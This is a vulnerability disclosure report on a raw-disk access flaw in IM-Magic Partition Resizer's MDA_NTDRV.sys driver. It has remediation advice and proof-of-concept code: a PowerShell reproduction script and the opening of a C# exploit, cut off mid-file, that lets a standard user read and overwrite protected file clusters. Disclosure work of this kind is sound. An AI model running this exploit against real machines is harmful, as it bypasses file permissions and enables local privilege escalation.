IM-Magic Partition Resizer 7.9.0 Kernel Driver Local Privilege Escalation
Summary
IM-Magic Partition Resizer Free Portable includes MDA_NTDRV.sys, a raw disk forwarding driver that exposes \\.\MDA_NTDRV\<disk>. A standard local user can open this device and perform raw reads and writes against a caller-selected physical disk number.
In the validation below, the standard user could not directly read or write an administrator-only flag file and could not directly open the underlying raw disk. The same user then read the flag's NTFS data clusters through \\.\MDA_NTDRV\1, and also overwrote those clusters through the driver. Administrator readback confirmed that the protected flag file content changed to the attacker's marker.
An unprivileged user can exploit arbitrary read/write primitives over protected file resources to achieve local privilege escalation.
Affected Product and Version
- Product: IM-Magic Partition Resizer Free Portable
- Product version documented by vendor package:
7.9.0 - Driver:
MDA_NTDRV.sys - Driver package location:
drivers\win7\amd64\MDA_NTDRV.sysinside the x64core.dllarchive - Driver SHA-256:
6DED9FFF47488D7B335DD3C9BBBD838C60FF1AFE28CCB8BB329D021592FFE9F3 - Driver signature:
Valid, signerChongqing NIUBI Technology Co., Ltd.
Download URL and SHA-256
- Download URL:
https://download.resize-c.com/resizer-free-portable.zip - File name:
resizer-free-portable.zip - Portable ZIP SHA-256:
B91F22DD8073EA92A889FEA236D3A11B006D217F7CE68B528D65B90751A3AF40 - x64
core.dllSHA-256:2666C159911CFCB959F983FF6B60D1C59B3BE3EDFFA813FB19F50633746569D0
Vulnerability Type
Local raw disk read/write access-control bypass resulting in protected file disclosure and protected file tampering.
Impact
A standard local user can bypass Windows file ACLs by reading and writing protected file data at the raw disk layer through the vendor driver. In the proof, the protected file granted access only to SYSTEM and Administrators, but the standard user recovered its marker and then replaced its on-disk content through MDA_NTDRV.sys.
This primitive is LPE-grade in realistic attack chains because raw disk writes can tamper with privileged on-disk state, service binaries, registry hives, or other protected files when combined with filesystem-aware offset calculation and cache-safe write handling. This report demonstrates the impact only on a temporary VHD and a self-created protected flag file.
Test Environment
- Host:
EXPDEV - OS: Microsoft Windows 11 Pro, version
10.0.26200, 64-bit - PowerShell:
5.1.26100.8115 - Administrator context used for setup and cleanup
- Standard test user context used for exploitation:
expdev\low - Standard test user integrity level: Medium
- Test disk: temporary fixed VHD, 96 MB
- Protected test object:
R:\protected\admin_only_flag.bin
Driver Load / Setup Steps
The validation used the official portable ZIP and a controlled temporary VHD:
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\repro_one_click.ps1 -UseEnvPassword -AttemptWriteThe script performs the following setup:
- Downloads
resizer-free-portable.zipfrom the official IM-Magic URL if it is not already present. - Extracts the portable ZIP with 7-Zip.
- Extracts the x64
core.dllfile as a ZIP archive. - Loads
drivers\win7\amd64\MDA_NTDRV.syswith a temporaryMDANTDRVReprokernel service. - Creates a temporary 96 MB VHD, assigns it as disk
1, formats it as NTFS, and creates an administrator-only flag file. - Resolves the flag file's first NTFS data run to disk offset
5865472, length20480. - Runs a single low-privilege exploit executable that prints baseline failures and the driver read result.
- Dismounts the volume and runs the same low-privilege executable in write mode against the temporary VHD only.
- Remounts the VHD and verifies as Administrator that the protected flag file now contains the low-user write marker.
- Dismounts the VHD, stops and deletes the temporary driver service, and removes temporary test directories.
Reproduction Steps
Run from an elevated PowerShell prompt:
$env:VENDOR_REPRO_LOW_PASSWORD = '<standard-user-password>'
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\repro_one_click.ps1 -UseEnvPassword -AttemptWrite
Remove-Item Env:\VENDOR_REPRO_LOW_PASSWORDAlternatively omit -UseEnvPassword and the script will prompt for the standard user's credential:
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\repro_one_click.ps1 -AttemptWriteWhat The Script Does
- Downloads the official portable package from
https://download.resize-c.com/resizer-free-portable.zipif needed. - Compiles the low-privilege C# exploit.
- Extracts the portable ZIP with the repo's 7-Zip helper.
- Extracts the x64
core.dllas a ZIP archive. - Loads
drivers\win7\amd64\MDA_NTDRV.syswith a temporaryMDANTDRVReprokernel service. - Creates and formats a temporary 96 MB VHD.
- Creates
R:\protected\admin_only_flag.binwith a unique marker and an ACL granting access only toSYSTEMandAdministrators. - Resolves the flag's first NTFS data run and computes its absolute disk offset.
- Runs the exploit as the standard user. The exploit performs baseline checks and then reads the flag data through
\\.\MDA_NTDRV\<disk>. - Dismounts the volume and runs the exploit as the standard user in write mode against the same raw disk offset.
- Remounts the VHD and verifies as Administrator that the protected file now contains the write marker.
- Dismounts the temporary VHD, stops and deletes the temporary driver service, removes test directories, and keeps the evidence directory.
Expected Successful Output
Read phase:
[IDENTITY] user=expdev\low
[IDENTITY] is_administrator=False
[IDENTITY] integrity=Medium
[BASELINE] protected_read=DENIED path=R:\protected\admin_only_flag.bin error=Access to the path 'R:\protected\admin_only_flag.bin' is denied.
[BASELINE] protected_write=DENIED path=R:\protected\admin_only_flag.bin error=Access to the path 'R:\protected\admin_only_flag.bin' is denied.
[BASELINE] raw_disk_open=DENIED path=\\.\PhysicalDrive1 error=5
[DRIVER] open=SUCCESS path=\\.\MDA_NTDRV\1
[RESULT] read_marker_found=TrueWrite phase:
[DRIVER] open=SUCCESS path=\\.\MDA_NTDRV\1
[EXPLOIT_WRITE] success=True device=MDA_NTDRV disk=1 offset=5865472 bytes=20480
[RESULT] write_succeeded=TrueThe admin verification file should contain "marker_found": true.
Baseline Evidence
The protected file ACL allowed only SYSTEM and Administrators:
R:\protected\admin_only_flag.bin NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
Successfully processed 1 files; Failed processing 0 filesThe low-privilege process identified itself as a standard, Medium Integrity user:
[IDENTITY] user=expdev\low
[IDENTITY] is_administrator=False
[IDENTITY] integrity=MediumDirect access failed without the driver:
[BASELINE] protected_read=DENIED path=R:\protected\admin_only_flag.bin error=Access to the path 'R:\protected\admin_only_flag.bin' is denied.
[BASELINE] protected_write=DENIED path=R:\protected\admin_only_flag.bin error=Access to the path 'R:\protected\admin_only_flag.bin' is denied.
[BASELINE] raw_disk_open=DENIED path=\\.\PhysicalDrive1 error=5Exploit Evidence
The standard-user read phase opened the IM-Magic device and recovered the protected flag marker:
[DRIVER] open=SUCCESS path=\\.\MDA_NTDRV\1
[EXPLOIT_READ] success=True device=MDA_NTDRV disk=1 offset=5865472 requested_bytes=20480 driver_reported_bytes=20480 out=C:\ProgramData\VendorRepro\immagic_mda_ntdrv_evidence\exploit_read_clusters.bin
[EXPLOIT_READ] prefix=IMMAGIC-MDA-PROTECTED-FLAG-a259e757-c8b7-4d3b-974a-44cabd6fe619AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[RESULT] read_marker_found=TrueThe standard-user write phase opened the same device and wrote a new marker to the protected file's raw disk clusters:
[DRIVER] open=SUCCESS path=\\.\MDA_NTDRV\1
[EXPLOIT_WRITE] success=True device=MDA_NTDRV disk=1 offset=5865472 bytes=20480
[EXPLOIT_WRITE] marker=IMMAGIC-MDA-WRITE-FLAG-3914f0f7-41d1-4e36-8a0c-a040f0852613
[RESULT] write_succeeded=TrueAdministrator readback after remount confirmed that the protected file was modified:
"marker_found": true
"prefix": "IMMAGIC-MDA-WRITE-FLAG-3914f0f7-41d1-4e36-8a0c-a040f0852613BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"Why This Proves the Vulnerability
The test user is a non-administrator at Medium Integrity. Direct access to both the protected NTFS file and \\.\PhysicalDrive1 failed. The successful read and write occurred only through the IM-Magic driver device \\.\MDA_NTDRV\1.
The read result proves protected data disclosure because the low-privilege user recovered an administrator-only flag marker. The write result proves protected data tampering because the low-privilege user wrote a new marker at the raw disk offset for that protected file, and Administrator readback confirmed the file content changed.
Therefore, MDA_NTDRV.sys exposes privileged raw disk read/write functionality to a standard user without enforcing the Windows access checks that would normally protect both the file and the physical disk.
Suggested Remediation
- Do not expose raw disk forwarding devices to unprivileged users.
- Create device objects with
IoCreateDeviceSecureand a restrictive SDDL that permits only administrators or a trusted service SID. - Use
FILE_DEVICE_SECURE_OPENwhere applicable. - Revalidate caller identity and requested access before forwarding raw disk reads, writes, or disk IOCTLs.
- Avoid forwarding arbitrary caller-controlled disk requests to lower storage stacks. If raw disk operations are required, restrict them to a broker service that enforces authorization and target allowlists.
- Add known vulnerable hashes, including
6DED9FFF47488D7B335DD3C9BBBD838C60FF1AFE28CCB8BB329D021592FFE9F3, to vulnerable-driver blocklists until fixed builds are available.
POC
repo_one_click.ps1
[CmdletBinding()]
param(
[string]$RepoRoot,
[string]$LowUser = 'EXPDEV\low',
[System.Management.Automation.PSCredential]$LowCredential,
[switch]$UseEnvPassword,
[switch]$AttemptWrite,
[switch]$SkipCleanup
)
$ErrorActionPreference = 'Stop'
$ProgressPreference = 'SilentlyContinue'
function Assert-Admin {
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]::new($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
throw 'Run from an elevated PowerShell session.'
}
}
function Get-LowCredential {
if ($LowCredential) { return $LowCredential }
if ($UseEnvPassword) {
$plain = [Environment]::GetEnvironmentVariable('VENDOR_REPRO_LOW_PASSWORD')
if ([string]::IsNullOrWhiteSpace($plain)) { throw 'VENDOR_REPRO_LOW_PASSWORD is not set.' }
return [System.Management.Automation.PSCredential]::new($LowUser, (ConvertTo-SecureString $plain -AsPlainText -Force))
}
return Get-Credential -UserName $LowUser -Message 'Credential for the standard test user'
}
function Download-PortableZip([string]$OutPath) {
if (Test-Path $OutPath) { return }
New-Item -ItemType Directory -Force -Path (Split-Path $OutPath -Parent) | Out-Null
Invoke-WebRequest -Uri 'https://download.resize-c.com/resizer-free-portable.zip' -OutFile $OutPath -UseBasicParsing -TimeoutSec 240 -Headers @{ 'User-Agent'='Mozilla/5.0' }
}
function Compile-Exploit([string]$SourcePath, [string]$ExePath) {
$csc = "$env:WINDIR\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
if (!(Test-Path $csc)) { throw "C# compiler not found: $csc" }
New-Item -ItemType Directory -Force -Path (Split-Path $ExePath -Parent) | Out-Null
& $csc /nologo /optimize+ /platform:x64 /target:exe "/out:$ExePath" $SourcePath
if ($LASTEXITCODE -ne 0) { throw 'Exploit compilation failed.' }
}
function Run-Low {
param(
[string]$Name,
[string]$FilePath,
[string[]]$ArgumentList,
[string]$Stdout,
[string]$Stderr,
[System.Management.Automation.PSCredential]$Credential,
[string]$StatusPath,
[switch]$AllowFailure
)
$p = Start-Process -FilePath $FilePath -ArgumentList $ArgumentList -Credential $Credential -LoadUserProfile -WindowStyle Hidden -Wait -PassThru -RedirectStandardOutput $Stdout -RedirectStandardError $Stderr
"$Name exit=$($p.ExitCode)" | Add-Content -LiteralPath $StatusPath -Encoding ascii
if ($p.ExitCode -ne 0 -and -not $AllowFailure) { throw "$Name failed with exit code $($p.ExitCode)." }
return $p.ExitCode
}
function Extract-Driver([string]$ZipPath, [string]$ExtractRoot, [string]$RepoRoot, [string]$EvidenceDir) {
$sevenZip = Join-Path $RepoRoot 'dev\tools\7zip-portable\7z.exe'
if (!(Test-Path $sevenZip)) { throw "7-Zip helper not found: $sevenZip" }
Remove-Item -LiteralPath $ExtractRoot -Recurse -Force -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force -Path $ExtractRoot | Out-Null
$outer = Join-Path $ExtractRoot 'portable'
$coreOut = Join-Path $ExtractRoot 'core_x64'
New-Item -ItemType Directory -Force -Path $outer, $coreOut | Out-Null
(& $sevenZip x $ZipPath "-o$outer" -y) | Out-File -LiteralPath (Join-Path $EvidenceDir 'extract_portable_zip.txt') -Encoding ascii
$core = Get-ChildItem -Path $outer -Recurse -File -Filter 'core.dll' | Where-Object { $_.FullName -match '\\x64\\core\.dll$' } | Select-Object -First 1
if (-not $core) { throw 'x64 core.dll was not found in the portable package.' }
(& $sevenZip x $core.FullName "-o$coreOut" -y) | Out-File -LiteralPath (Join-Path $EvidenceDir 'extract_core_dll.txt') -Encoding ascii
$driver = Join-Path $coreOut 'drivers\win7\amd64\MDA_NTDRV.sys'
if (!(Test-Path $driver)) { throw 'drivers\win7\amd64\MDA_NTDRV.sys was not found inside x64 core.dll.' }
[pscustomobject]@{
core_path = $core.FullName
core_sha256 = (Get-FileHash $core.FullName -Algorithm SHA256).Hash
driver_path = $driver
} | ConvertTo-Json | Set-Content -LiteralPath (Join-Path $EvidenceDir 'extraction_metadata.json') -Encoding ascii
return Get-Item $driver
}
function Ensure-DriverLoaded([string]$DriverPath, [string]$EvidenceDir) {
$log = Join-Path $EvidenceDir 'driver_service_load.txt'
"Driver path: $DriverPath" | Set-Content -LiteralPath $log -Encoding ascii
(& sc.exe stop MDANTDRVRepro 2>&1) | Out-File -LiteralPath $log -Append -Encoding ascii
(& sc.exe delete MDANTDRVRepro 2>&1) | Out-File -LiteralPath $log -Append -Encoding ascii
(& sc.exe create MDANTDRVRepro type= kernel start= demand binPath= $DriverPath 2>&1) | Out-File -LiteralPath $log -Append -Encoding ascii
(& sc.exe start MDANTDRVRepro 2>&1) | Out-File -LiteralPath $log -Append -Encoding ascii
(& sc.exe query MDANTDRVRepro 2>&1) | Out-File -LiteralPath $log -Append -Encoding ascii
(& sc.exe qc MDANTDRVRepro 2>&1) | Out-File -LiteralPath (Join-Path $EvidenceDir 'driver_service_config.txt') -Encoding ascii
}
function Create-Vhd([string]$WorkRoot, [string]$EvidenceDir) {
$vhd = Join-Path $WorkRoot 'controlled_disk.vhd'
$script = Join-Path $WorkRoot 'create_vhd.diskpart'
@"
create vdisk file="$vhd" maximum=96 type=fixed
select vdisk file="$vhd"
attach vdisk
create partition primary
"@ | Set-Content -LiteralPath $script -Encoding ascii
(& diskpart.exe /s $script) | Out-File -LiteralPath (Join-Path $EvidenceDir 'diskpart_create.txt') -Encoding ascii
$disk = Get-DiskImage -ImagePath $vhd | Get-Disk
$partition = Get-Partition -DiskNumber $disk.Number | Where-Object { $_.Type -ne 'Reserved' } | Select-Object -First 1
$partition | Format-List | Out-File -LiteralPath (Join-Path $EvidenceDir 'partition_before_format.txt') -Encoding ascii
$partition | Set-Partition -NewDriveLetter R
Format-Volume -DriveLetter R -FileSystem NTFS -NewFileSystemLabel MDAREPRO -Confirm:$false -Force | Format-List | Out-File -LiteralPath (Join-Path $EvidenceDir 'format_volume.txt') -Encoding ascii
return $disk.Number
}
function New-ProtectedFlag([uint32]$DiskNumber, [string]$WorkRoot, [string]$EvidenceDir) {
New-Item -ItemType Directory -Force -Path 'R:\protected' | Out-Null
$marker = 'IMMAGIC-MDA-PROTECTED-FLAG-' + [guid]::NewGuid().ToString()
$bytes = New-Object byte[] 20480
$markerBytes = [Text.Encoding]::ASCII.GetBytes($marker)
[Array]::Copy($markerBytes, 0, $bytes, 0, $markerBytes.Length)
for ($i = $markerBytes.Length; $i -lt $bytes.Length; $i++) { $bytes[$i] = 0x41 }
$flag = 'R:\protected\admin_only_flag.bin'
[IO.File]::WriteAllBytes($flag, $bytes)
(& icacls.exe $flag /inheritance:r /grant:r 'Administrators:F' 'SYSTEM:F') | Out-File -LiteralPath (Join-Path $EvidenceDir 'flag_acl_set.txt') -Encoding ascii
(& icacls.exe $flag) | Out-File -LiteralPath (Join-Path $EvidenceDir 'flag_acl.txt') -Encoding ascii
$ntfs = (fsutil fsinfo ntfsinfo R:) 2>&1
$extents = (fsutil file queryextents $flag) 2>&1
$ntfs | Out-File -LiteralPath (Join-Path $EvidenceDir 'ntfs_info.txt') -Encoding ascii
$extents | Out-File -LiteralPath (Join-Path $EvidenceDir 'file_extents.txt') -Encoding ascii
[uint64]$bytesPerCluster = 0
foreach ($line in $ntfs) { if ($line -match 'Bytes Per Cluster\s*:\s*(\d+)') { $bytesPerCluster = [uint64]$Matches[1] } }
$lcn = $null; $clusters = $null
foreach ($line in $extents) {
if ($line -match 'VCN:\s*0x[0-9a-fA-F]+\s+Clusters:\s*0x([0-9a-fA-F]+)\s+LCN:\s*0x([0-9a-fA-F]+)') {
$clusters = [Convert]::ToUInt64($Matches[1], 16)
$lcn = [Convert]::ToUInt64($Matches[2], 16)
break
}
}
if ($bytesPerCluster -eq 0 -or $null -eq $lcn) { throw 'Could not parse NTFS data run.' }
$partition = Get-Partition -DriveLetter R
[uint64]$diskOffset = [uint64]$partition.Offset + ($lcn * $bytesPerCluster)
[uint64]$runLength = $clusters * $bytesPerCluster
$meta = [pscustomobject]@{
marker = $marker
vhd_path = (Join-Path $WorkRoot 'controlled_disk.vhd')
disk_number = $DiskNumber
drive_letter = 'R'
partition_offset = [uint64]$partition.Offset
bytes_per_cluster = $bytesPerCluster
first_lcn = $lcn
first_run_clusters = $clusters
disk_offset = $diskOffset
run_length = $runLength
protected_file = $flag
}
$meta | ConvertTo-Json | Set-Content -LiteralPath (Join-Path $EvidenceDir 'test_object_metadata.json') -Encoding ascii
return $meta
}
function Cleanup-Repro([string]$WorkRoot, [string]$ExtractRoot, [string]$EvidenceDir) {
$cleanup = Join-Path $EvidenceDir 'cleanup_log.txt'
"Cleanup started: $(Get-Date -Format o)" | Set-Content -LiteralPath $cleanup -Encoding ascii
try {
$vhd = Join-Path $WorkRoot 'controlled_disk.vhd'
if (Test-Path $vhd) { Dismount-DiskImage -ImagePath $vhd -ErrorAction SilentlyContinue | Out-File -LiteralPath $cleanup -Append -Encoding ascii }
(& sc.exe stop MDANTDRVRepro 2>&1) | Out-File -LiteralPath $cleanup -Append -Encoding ascii
(& sc.exe delete MDANTDRVRepro 2>&1) | Out-File -LiteralPath $cleanup -Append -Encoding ascii
Remove-Item -LiteralPath $WorkRoot, $ExtractRoot -Recurse -Force -ErrorAction SilentlyContinue
} finally {
"WorkRoot exists after cleanup: $(Test-Path $WorkRoot)" | Add-Content -LiteralPath $cleanup -Encoding ascii
"ExtractRoot exists after cleanup: $(Test-Path $ExtractRoot)" | Add-Content -LiteralPath $cleanup -Encoding ascii
"MDANTDRVRepro service query after cleanup:" | Add-Content -LiteralPath $cleanup -Encoding ascii
(& sc.exe query MDANTDRVRepro 2>&1) | Out-File -LiteralPath $cleanup -Append -Encoding ascii
}
}
Assert-Admin
$credential = Get-LowCredential
$packageDir = $PSScriptRoot
if ([string]::IsNullOrWhiteSpace($RepoRoot)) { $RepoRoot = (Resolve-Path (Join-Path $packageDir '..\..\..')).Path }
$workRoot = 'C:\ProgramData\VendorRepro\immagic_mda_ntdrv'
$extractRoot = 'C:\ProgramData\VendorRepro\immagic_mda_ntdrv_extract'
$evidenceTemp = 'C:\ProgramData\VendorRepro\immagic_mda_ntdrv_evidence'
$finalEvidence = Join-Path $packageDir 'evidence'
$portableZip = Join-Path $RepoRoot 'dev\downloads\im_magic_resizer\resizer-free-portable.zip'
$exploitSource = Join-Path $RepoRoot 'dev\poc\raw_disk_forwarder_flag_rw_exploit.cs'
$exploitExe = Join-Path $RepoRoot 'dev\poc\bin\raw_disk_forwarder_flag_rw_exploit.exe'
Remove-Item -LiteralPath $evidenceTemp -Recurse -Force -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force -Path $workRoot, $evidenceTemp | Out-Null
(& icacls.exe $workRoot /grant '*S-1-5-32-545:(OI)(CI)M') | Out-File -LiteralPath (Join-Path $evidenceTemp 'runtime_acl_setup.txt') -Encoding ascii
(& icacls.exe $evidenceTemp /grant '*S-1-5-32-545:(OI)(CI)M') | Out-File -LiteralPath (Join-Path $evidenceTemp 'evidence_acl_setup.txt') -Encoding ascii
try {
Download-PortableZip $portableZip
Compile-Exploit $exploitSource $exploitExe
$driver = Extract-Driver -ZipPath $portableZip -ExtractRoot $extractRoot -RepoRoot $RepoRoot -EvidenceDir $evidenceTemp
Ensure-DriverLoaded -DriverPath $driver.FullName -EvidenceDir $evidenceTemp
$diskNumber = Create-Vhd -WorkRoot $workRoot -EvidenceDir $evidenceTemp
$meta = New-ProtectedFlag -DiskNumber ([uint32]$diskNumber) -WorkRoot $workRoot -EvidenceDir $evidenceTemp
$status = Join-Path $evidenceTemp 'low_run_status.txt'
'IM-Magic MDA_NTDRV low-user EXP run status' | Set-Content -LiteralPath $status -Encoding ascii
$readOut = Join-Path $evidenceTemp 'exploit_read_clusters.bin'
Run-Low -Name 'low_exp_read' -FilePath $exploitExe -Credential $credential -StatusPath $status `
-Stdout (Join-Path $evidenceTemp 'low_exp_read_stdout.txt') `
-Stderr (Join-Path $evidenceTemp 'low_exp_read_stderr.txt') `
-ArgumentList @('--device','MDA_NTDRV','--mode','read','--disk',[string]$meta.disk_number,'--offset',[string]$meta.disk_offset,'--length',[string]$meta.run_length,'--flag-path',$meta.protected_file,'--expect-marker',$meta.marker,'--out',$readOut)
$zipSig = Get-AuthenticodeSignature $portableZip
$driverSig = Get-AuthenticodeSignature $driver.FullName
$extractMeta = Get-Content -LiteralPath (Join-Path $evidenceTemp 'extraction_metadata.json') | ConvertFrom-Json
[pscustomobject]@{
product = 'IM-Magic Partition Resizer Free Portable'
product_version = '7.9.0'
download_url = 'https://download.resize-c.com/resizer-free-portable.zip'
file_name = 'resizer-free-portable.zip'
portable_zip_sha256 = (Get-FileHash $portableZip -Algorithm SHA256).Hash
portable_zip_signature_status = $zipSig.Status.ToString()
x64_core_sha256 = $extractMeta.core_sha256
driver_name = 'MDA_NTDRV.sys'
driver_path = $driver.FullName
driver_sha256 = (Get-FileHash $driver.FullName -Algorithm SHA256).Hash
driver_signature_status = $driverSig.Status.ToString()
driver_signer_subject = $driverSig.SignerCertificate.Subject
driver_load_method = 'Official portable ZIP extracted with 7-Zip; x64 core.dll extracted as ZIP; drivers\win7\amd64\MDA_NTDRV.sys loaded with temporary MDANTDRVRepro kernel service.'
low_exploit = 'raw_disk_forwarder_flag_rw_exploit.exe'
low_exploit_sha256 = (Get-FileHash $exploitExe -Algorithm SHA256).Hash
device_path = '\\.\MDA_NTDRV\<disk>'
} | ConvertTo-Json -Depth 4 | Set-Content -LiteralPath (Join-Path $evidenceTemp 'product_driver_metadata.json') -Encoding ascii
if ($AttemptWrite) {
try {
$writeMarker = 'IMMAGIC-MDA-WRITE-FLAG-' + [guid]::NewGuid().ToString()
[pscustomObject]@{ write_marker = $writeMarker; disk_number = $meta.disk_number; disk_offset = $meta.disk_offset; run_length = $meta.run_length } | ConvertTo-Json | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_marker_metadata.json') -Encoding ascii
(& mountvol.exe R: /p) | Out-File -LiteralPath (Join-Path $evidenceTemp 'volume_dismount_before_write.txt') -Encoding ascii
Start-Sleep -Seconds 2
$writeExit = Run-Low -Name 'low_exp_write' -FilePath $exploitExe -Credential $credential -StatusPath $status -AllowFailure `
-Stdout (Join-Path $evidenceTemp 'low_exp_write_stdout.txt') `
-Stderr (Join-Path $evidenceTemp 'low_exp_write_stderr.txt') `
-ArgumentList @('--device','MDA_NTDRV','--mode','write','--disk',[string]$meta.disk_number,'--offset',[string]$meta.disk_offset,'--length',[string]$meta.run_length,'--write-marker',$writeMarker)
Get-Partition -DiskNumber ([int]$meta.disk_number) | Where-Object { $_.Type -ne 'Reserved' } | Select-Object -First 1 | Set-Partition -NewDriveLetter R
Start-Sleep -Seconds 2
if ($writeExit -eq 0) {
$afterBytes = [IO.File]::ReadAllBytes($meta.protected_file)
$afterPrefix = [Text.Encoding]::ASCII.GetString($afterBytes, 0, [Math]::Min(256, $afterBytes.Length))
$found = $afterPrefix.Contains($writeMarker)
[pscustomobject]@{ expected_write_marker = $writeMarker; marker_found = $found; prefix = $afterPrefix } | ConvertTo-Json | Set-Content -LiteralPath (Join-Path $evidenceTemp 'admin_verify_after_write.json') -Encoding ascii
if ($found) {
'Write phase succeeded and was verified by admin readback from the protected test file.' | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_phase_status.txt') -Encoding ascii
} else {
'Write phase returned success but admin verification did not find the write marker; read impact remains verified.' | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_phase_status.txt') -Encoding ascii
}
} else {
"Write phase low-user process exited $writeExit; read impact remains verified." | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_phase_status.txt') -Encoding ascii
}
} catch {
"Write phase failed non-fatally: $($_.Exception.Message). Read impact remains verified." | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_phase_status.txt') -Encoding ascii
}
} else {
'Write phase skipped by default; read-only protected-file disclosure proof completed.' | Set-Content -LiteralPath (Join-Path $evidenceTemp 'write_phase_skipped.txt') -Encoding ascii
}
if (-not $SkipCleanup) { Cleanup-Repro $workRoot $extractRoot $evidenceTemp }
Remove-Item -LiteralPath $finalEvidence -Recurse -Force -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force -Path $finalEvidence | Out-Null
Copy-Item -Path (Join-Path $evidenceTemp '*') -Destination $finalEvidence -Force
Write-Host "Reproduction complete. Evidence copied to $finalEvidence"
} catch {
"BLOCKED_OR_FAILED: $($_.Exception.Message)" | Set-Content -LiteralPath (Join-Path $evidenceTemp 'blocked_or_failed.txt') -Encoding ascii
if (-not $SkipCleanup) { Cleanup-Repro $workRoot $extractRoot $evidenceTemp }
Remove-Item -LiteralPath $finalEvidence -Recurse -Force -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force -Path $finalEvidence | Out-Null
Copy-Item -Path (Join-Path $evidenceTemp '*') -Destination $finalEvidence -Force -ErrorAction SilentlyContinue
throw
}
raw_disk_forwarder_flag_rw_exploit.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;
using Microsoft.Win32.SafeHandles;
internal static class RawDiskForwarderFlagRwExploit
{
private const uint GENERIC_READ = 0x80000000;
private const uint GENERIC_WRITE = 0x40000000;
private const uint FILE_SHARE_READ = 0x00000001;
private const uint FILE_SHARE_WRITE = 0x00000002;
private const uint OPEN_EXISTING = 3;
private const uint FILE_BEGIN = 0;
private const int TOKEN_QUERY = 0x0008;
private const int TokenIntegrityLevel = 25;
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern SafeFileHandle CreateFileW(
string lpFileName,
uint dwDesiredAccess,
uint dwShareMode,
IntPtr lpSecurityAttributes,
uint dwCreationDisposition,
uint dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool SetFilePointerEx(SafeFileHandle hFile, long liDistanceToMove, IntPtr lpNewFilePointer, uint dwMoveMethod);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool ReadFile(SafeFileHandle hFile, IntPtr lpBuffer, int nNumberOfBytesToRead, out int lpNumberOfBytesRead, IntPtr lpOverlapped);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteFile(SafeFileHandle hFile, IntPtr lpBuffer, int nNumberOfBytesToWrite, out int lpNumberOfBytesWritten, IntPtr lpOverlapped);
[DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool CloseHandle(IntPtr hObject);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool OpenProcessToken(IntPtr processHandle, int desiredAccess, out IntPtr tokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool GetTokenInformation(IntPtr tokenHandle, int tokenInformationClass, IntPtr tokenInformation, int tokenInformationLength, out int returnLength);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern IntPtr GetSidSubAuthorityCount(IntPtr pSid);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern IntPtr GetSidSubAuthority(IntPtr pSid, uint nSubAuthority);
private static int Main(string[] args)
{
try
{
Options opt = Options.Parse(args);
if (opt == null)
{
Usage();
return 2;
}
PrintIdentity();
if (!string.IsNullOrEmpty(opt.FlagPath))
{
BaselineProtectedFile(opt.FlagPath);
}
BaselineRawDisk(opt.Disk);
string devicePath = @"\\.\" + opt.Device + @"\" + opt.Disk;
using (SafeFileHandle h = OpenForwarder(devicePath))
{
if (h.IsInvalid)
{
Console.Error.WriteLine("[DRIVER] open=FAILED path={0} error={1}", devicePath, Marshal.GetLastWin32Error());
return 1;
}
Console.WriteLine("[DRIVER] open=SUCCESS path={0}", devicePath);
if (opt.Mode == "read")
{
int reportedBytes;
byte[] data = RawRead(h, opt.OffsetBytes, checked((int)opt.LengthBytes), out reportedBytes);
File.WriteAllBytes(opt.OutPath, data);
string prefix = AsciiPreview(data, 256);
bool found = !string.IsNullOrEmpty(opt.ExpectMarker) && Encoding.ASCII.GetString(data).Contains(opt.ExpectMarker);
Console.WriteLine("[EXPLOIT_READ] success=True device={0} disk={1} offset={2} requested_bytes={3} driver_reported_bytes={4} out={5}", opt.Device, opt.Disk, opt.OffsetBytes, data.Length, reportedBytes, opt.OutPath);
Console.WriteLine("[EXPLOIT_READ] prefix={0}", prefix);
if (!string.IsNullOrEmpty(opt.ExpectMarker))
{
Console.WriteLine("[RESULT] read_marker_found={0}", found);
return found ? 0 : 3;
}
return 0;
}
byte[] payload = MakePayload(opt.WriteMarker, checked((int)opt.LengthBytes));
RawWrite(h, opt.OffsetBytes, payload);
Console.WriteLine("[EXPLOIT_WRITE] success=True device={0} disk={1} offset={2} bytes={3}", opt.Device, opt.Disk, opt.OffsetBytes, payload.Length);
